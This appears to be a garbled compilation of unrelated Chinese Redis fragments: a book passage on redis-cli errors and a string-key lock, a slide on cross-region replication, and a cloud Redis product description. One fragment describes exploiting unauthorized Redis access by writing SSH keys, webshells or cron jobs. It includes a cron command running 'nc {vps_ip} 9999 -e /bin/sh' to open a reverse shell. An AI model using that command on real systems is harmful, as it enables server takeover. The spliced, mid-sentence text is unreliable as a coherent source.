客户端未能连接服务器，返回⼀个连接错误 127.0.0.1:6379> PING Could not connect to Redis at 127.0.0.1:6379: Connection refused 我们为这个命令调⽤添加了⼀条注释， ⽤于说明客户端遇到的问题。 在本书中， redis-cli 客户端的命令执⾏示 例都使⽤ -- 作为注释前缀， 这些注释仅⽤于对被执⾏的命令做进⼀步的说明， 它们并不是被执⾏命令的⼀部 在任何时候， 最多只能有⼀个进程取得锁， 我们把成功取得锁的这 个进程称之为锁的持有者。 在锁已经被持有的情况下， 所有尝试再次获取锁的操作都会失败。 释放操作⽤于放弃资源的独占使⽤权， ⼀般由锁的持有者调⽤。 在锁被释放之后， 其他进程就可以再次尝 试获取这个锁了。 代码清单 2-2 展示了⼀个使⽤字符串键实现的锁程序， 这个程序会根据给定的字符串键是否有值来判断锁是否已 经被获取， ⽽针对锁的获取 并返回被成功删除的键数量作为结果： DEL key [key ...] 因为 Redis 的 DEL 命令和 Python 的 del 关键字重名， 所以在 redis-py 客户端中， 执⾏ DEL 命令实际上是通过 调⽤ delete() ⽅法来完成的： self.client.delete(self.key) == 1 release() ⽅法通过检查 delete() ⽅法的返回值是否为 1 来判断删除操作是否执⾏成功：

命令，可以进行写文件 操作，攻击者可以成功将自己的ssh公钥写入目标服务器的 /root/.ssh 文件夹的authotrized_keys 文件 中，进而可以使用对应私钥直接使用ssh服务登录目标服务器、添加计划任务、写入Webshell等操作。 漏洞利用 环境介绍 环境搭建 常见的未授权访问漏洞： Redis 未授权访问漏洞 MongoDB 未授权访问漏洞 Jenkins 未授权访问漏洞 -it a8ff7ed880fb sh # 进入容器 echo '* * * * * /usr/bin/nc {vps_ip} 9999 -e /bin/sh' >> /tmp/root #添加计划任务 cat /tmp/root # 查看/tmp/root 文件 exit #退出容器 反弹宿主机shell 还有其他比如写入ssh公钥等利用方式，方式方法都是大同小异的，这里就不再介绍了。

Consistency Partition 技 术 选 型 首先,P(网络分区)是首 要考虑因素 其次, 跨区域部署就是 为了提高可用性 最后,我们使用"最终一 致性"来解决数据冲突 双向回 环 环形复 制 数据一 致性 网络模 型的选 择 双向/多向同步有哪些共同的问题 网络通讯的 模型选择 Redis A: • set k v Redis B: • set

令行和通用客户端进行数据的增删改查操作。当主节点出现故障，自研的 HA 系统会自动进 行主备切换，保证业务平稳运行。 数据可靠 默认开启数据持久化功能，数据全部落盘。支持数据备份功能，用户可以针对备份集回滚实 例或者克隆实例，有效的解决数据误操作等问题。 兼容性 云数据库 Redis 版 产品简介 12 云数据库 Redis 标准版在 Redis 2.8基础上进行开发，100%兼容